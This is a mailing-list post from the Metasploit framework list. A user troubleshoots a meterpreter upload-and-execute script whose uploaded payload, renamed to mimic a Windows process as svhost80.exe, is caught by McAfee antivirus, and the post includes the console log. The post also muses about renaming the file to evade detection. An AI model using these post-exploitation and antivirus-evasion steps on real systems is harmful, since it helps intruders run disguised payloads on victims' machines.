Metasploit mailing list archives

upload and execute script error in meterpreter


From: Miguel Rios <miguelrios35 () yahoo com>
Date: Fri, 8 Oct 2010 08:22:19 -0700 (PDT)

Hi,
When trying to run the upload and execute script in a meterpreter reverse tcp session I'm getting the following error 
because  McAfee Viruscan is picking up the created svhost*.exe as New Malware.b. When I download bc.exe directly and 
execute it on the target it runs fine and doesn't get picked up by McAfee Viruscan. It seems mcafee is picking up on 
the fact that svhost is being created rather than the actual binary. Anyone else have this experience? I guess I could 
try to change the script and change maybe the path and name of the uploaded file to see if that makes a difference.

Running Multiscript script.....
[*] Running script List ...
[*]     running script uploadexec -e /opt/metasploit3/msf3/bc.exe
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /opt/metasploit3/msf3/bc.exe....
[*]     /opt/metasploit3/msf3/bc.exe uploaded!
[*]     Uploaded as C:\DOCUME~1\Util\LOCALS~1\Temp\svhost80.exe
[*]     running command C:\DOCUME~1\Util\LOCALS~1\Temp\svhost80.exe
[*] Error Running Command C:\DOCUME~1\Util\LOCALS~1\Temp\svhost80.exe: Rex::Post::Meterpreter::RequestError 
stdapi_sys_process_execute: Operation failed: 2
[*] Finished!
[*]     running script
[-] Error: TypeError can't convert nil into String
[-] Error in script:
Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 2
[*] Finished!
[*]     running script
[-] Error: TypeError can't convert nil into String
[-] Error in script:




      
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: